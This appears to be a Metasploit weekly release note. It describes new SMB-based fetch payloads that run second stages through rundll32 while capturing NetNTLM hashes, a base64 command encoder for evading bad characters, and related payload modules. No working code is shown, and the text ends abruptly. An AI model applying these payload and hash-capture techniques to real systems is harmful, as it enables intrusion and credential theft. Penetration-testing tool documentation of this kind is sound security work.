New Fetch Payload
It has been almost a year since Metasploit released the new fetch payloads and since then, 43 of the 79 exploit modules have had support for fetch payloads. The original payloads supported transferring the second stage over HTTP, HTTPS and FTP. This week, Metasploit has expanded that protocol support to include SMB, allowing payloads to be run using rundll32 which has the added benefit of capturing the NetNTLM hashes of the requestor.
This also streamlines the workflow the user would have previously used by first starting the exploit/windows/smb/smb_delivery module, and then copying the command into another exploit. Now the user can simply select one of the SMB-enabled fetch payloads and Metasploit will manage the service and generate the command.
As an added benefit, since #18680 merged into Metasploit, multiple SMB services can be run simultaneously. This means that multiple SMB-enabled fetch payloads can have their own independent handlers running at the same time.
New module content (2)
Base64 Command Encoder
Author: Spencer McIntyre
Type: Encoder
Pull request: #18807 contributed by zeroSteiner
Description: This adds a new encoder module that leverages base64 encoding to escape bad characters in ARCH_CMD payloads for the Linux and UNIX platforms.
SMB Fetch, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager
Authors: Spencer McIntyre, bwatters-r7, and sf [email protected]
Type: Payload (Adapter)
Pull request: #18664 contributed by
metasploit
weekly
